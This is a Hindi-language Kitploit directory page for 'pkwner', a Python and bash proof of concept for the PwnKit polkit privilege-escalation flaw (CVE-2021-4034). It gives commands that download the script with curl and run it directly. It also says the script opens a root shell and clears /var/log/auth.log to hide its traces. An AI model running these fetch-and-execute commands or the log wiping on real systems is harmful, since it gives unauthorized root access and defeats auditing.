Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
pkwner — CVE-2021-4034 के लिए Kim Schulz द्वारा एक python3 और bash PoC | Kitploit
उपकरण/GitHubGitHub/kimusan/pkwner
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubkimusan/pkwner

pkwner

CVE-2021-4034 के लिए Kim Schulz द्वारा एक python3 और bash PoC

रिपॉजिटरी देखें
2374 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
root@kitploit:~
██████╗ ██╗  ██╗██╗    ██╗███╗   ██╗███████╗██████╗ 
██╔══██╗██║ ██╔╝██║    ██║████╗  ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗  ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝  ██╔══██╗
██║     ██║  ██╗╚███╔███╔╝██║ ╚████║███████╗██║  ██║
╚═╝     ╚═╝  ╚═╝ ╚══╝╚══╝ ╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝
Kim Schulz द्वारा CVE-2021-4034 के लिए एक Python3 और BASH PoC

परिचय

यह नए पाए गए Polkit त्रुटि PwnKit के लिए एक सरल PoC है।

मैंने इसे bash और python3 स्क्रिप्ट दोनों के रूप में बनाया है - सिर्फ मनोरंजन के लिए।

यह समस्या दुरुपयोग करने में बहुत सरल है लेकिन इसके बहुत बड़े परिणाम हैं क्योंकि यह अधिकांश Linux मशीनों पर आसानी से root पहुंच देगी जहाँ हमलावर के पास स्थानीय उपयोगकर्ता पहुंच है।

कैसे चलाएं

ये स्क्रिप्ट एक-शॉट निष्पादन हैं इसलिए बस करें

root@kitploit:~
python3 pkwner.py

या

root@kitploit:~
bash pkwner.sh

आप इसे सीधे वेबसर्वर (जैसे यह github रिपॉजिटरी) से भी चला सकते हैं:

root@kitploit:~
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)

या

root@kitploit:~
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))

दोनों मामलों में यह कुछ इस तरह दिखना चाहिए: alt text और alt text

स्क्रिप्ट कुछ फाइलें और फ़ोल्डर बनाएगी लेकिन root शेल पॉप होने के बाद खुद को साफ कर लेगी - यह /var/log/auth.log को भी साफ कर देगी (क्योंकि क्यों नहीं)।

श्रेय

  • Qualys समस्या खोजने और जानकारी सार्वजनिक करने के लिए
  • Andris Raugulis प्रेरणा लेने के लिए पहले PoCs में से एक बनाने के लिए
  • MiscGang क्योंकि misgang@Kalmarunionen बहुत बढ़िया हैं
टूल डाउनलोड करें